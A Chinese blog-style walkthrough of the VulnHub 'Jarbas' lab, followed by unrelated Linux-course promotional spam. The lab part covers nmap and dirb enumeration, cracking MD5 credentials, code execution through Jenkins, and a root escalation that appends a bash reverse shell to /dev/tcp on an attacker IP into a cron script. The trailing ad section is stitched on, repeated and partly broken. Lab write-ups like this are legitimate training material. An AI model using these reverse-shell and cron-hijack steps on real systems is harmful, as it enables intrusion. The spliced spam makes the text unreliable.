红队笔记-2：JARBAS打靶流程（vulnhub），2024年最新vivoLinux运维面试

Sudo nmap –script=vuln -p22.80.3306.8080 192.168.254.142

http-enum(枚举):nmap枚举出来一个robots.txt

3.攻击权重分析

1.80端口：是web的部署端口，攻击面大，优先级最高

2.8080端口：可能是80端口web的后台，登录后台getshell

3.3306端口：mysql数据库端口，很少有漏洞利用，所有权重放低

4.22端口：ssh很少出现漏洞，打靶场也不建议爆破，所有权重放低

4.80和8080端口-jenkins CMS + dirb限定扫描后缀

80:

8080：

应该是前后台的关系，8080端口，有个jenkins 关键词可以上网查询一些，了解一下这后台是什么，这里存在登录，因此我们的首要思路就是如何找到这个登录界面的账号和密码，寻找用户名和密码有如下几个思路：

1. 尝试默认登录，Jenkins是常见cms，可能存在默认密码
2. 尝试弱口令爆破（打靶场不建议）
3. 尝试渗透寻找相关密码。

我们先去目录爆破，在爆破的途中，去查看源码 ，测试弱口令，找默认密码这些操作

Dirb 没有扫到任何有用的东西

Gobuster 也没有扫描到任何东西

当我们使用工具默认的参数（不带任何参数）去目录爆破没有任何进展的适合，可以尝试限定参数；我们可以观察到web是php写的

那我们就可以限定一下目录爆破扫描路径的后缀，什么文件对我们重要嘞（.html,.php，.txt.zip的后缀的文件）

sudo dirb http://192.168.254.142 -X .php,.html

-X 就是限定扫描后缀文件

可以看到当我们使用参数后，又多扫出来一个路径access.html！！！

我们可以看到，这是一个好像用户名密码的页面，

Hash-indentifier 识别密码使用什么加密方式，发现是MD5加密

解密得到：

依次尝试密码登录后台

发现都不对，但是这信息肯定是有用，我怀疑是组合的问题，这里用户少可以自己尝试，但用户多的情况，使用bp排序爆破

依次匹配发现eder : vipsu是正确的账号密码

因为我们不熟悉Jenkins，所有可以上网查询

Jenkins是一个ci工具：

那什么又是ci工具嘞？

CI全名Continuous integration（持续集成），简单来说持续集成就是频繁地（一天多次）将代码集成到主干；

每次集成都通过自动化的构建（包括编译、发布、自动化测试）来验证，从而尽快地发现集成错误。

Ci工具可以编译，（说明我可以执行代码）

Jenkins的利用:

4.Exacute执行

6.运行脚本

我们就初步获得立足点：

5.提权-定时任务提权

ip a

whoami

id

uname -a

命令查看系统信息

我们是jenkins用户，权限不高，而且我们获得的也是不完全bash上，主机叫jarbas

先看一下、/etc/passwd文件

发现eder用户 又 /bin/hash，和后台用户名一致，可以尝试ssh(尝试过后发现不行)

sudo -l

发现需要密码

尝试的去看看定时任务/etc/crontab（还要etc/cron.d）

cat /etc/crontab

那么我们接下来就尝试修改/etc/script/CleaningScript.sh脚本

可以看见这脚本在执行的是一个删除日志的任务，我们要修改脚本.

1.echo追加脚本

2.替换文件

因为是不完全的shell,我们使用vim有限制

echo “/bin/bash –i >& /dev/tcp/192.168.200.131/4443 0>&1” >> /etc/script/CleaningScript.sh 

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数Linux运维工程师，想要提升技能，往往是自己摸索成长或者是报班学习，但对于培训机构动则几千的学费，着实压力不小。自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年Linux运维全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友，同时减轻大家的负担。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上Linux运维知识点，真正体系化！

由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新

如果你觉得这些内容对你有帮助，可以添加VX：vip1024b （备注Linux运维获取）

最全的Linux教程，Linux从入门到精通

======================

1. linux从入门到精通(第2版)

2. Linux系统移植

3. Linux驱动开发入门与实战

4. LINUX 系统移植 第2版

5. Linux开源网络全栈详解 从DPDK到OpenFlow

第一份《Linux从入门到精通》466页

====================

内容简介

====

本书是获得了很多读者好评的Linux经典畅销书**《Linux从入门到精通》的第2版**。本书第1版出版后曾经多次印刷，并被51CTO读书频道评为“最受读者喜爱的原创IT技术图书奖”。本书第﹖版以最新的Ubuntu 12.04为版本，循序渐进地向读者介绍了Linux 的基础应用、系统管理、网络应用、娱乐和办公、程序开发、服务器配置、系统安全等。本书附带1张光盘，内容为本书配套多媒体教学视频。另外,本书还为读者提供了大量的Linux学习资料和Ubuntu安装镜像文件，供读者免费下载。

本书适合广大Linux初中级用户、开源软件爱好者和大专院校的学生阅读，同时也非常适合准备从事Linux平台开发的各类人员。

需要《Linux入门到精通》、《linux系统移植》、《Linux驱动开发入门实战》、《Linux开源网络全栈》电子书籍及教程的工程师朋友们劳烦您转发+评论

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

rt/9d4aefb6a92edea27b825e59aa1f2c54.png)

本书适合广大Linux初中级用户、开源软件爱好者和大专院校的学生阅读，同时也非常适合准备从事Linux平台开发的各类人员。

需要《Linux入门到精通》、《linux系统移植》、《Linux驱动开发入门实战》、《Linux开源网络全栈》电子书籍及教程的工程师朋友们劳烦您转发+评论

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！
[外链图片转存中…(img-OUE8O2n8-1713083335161)]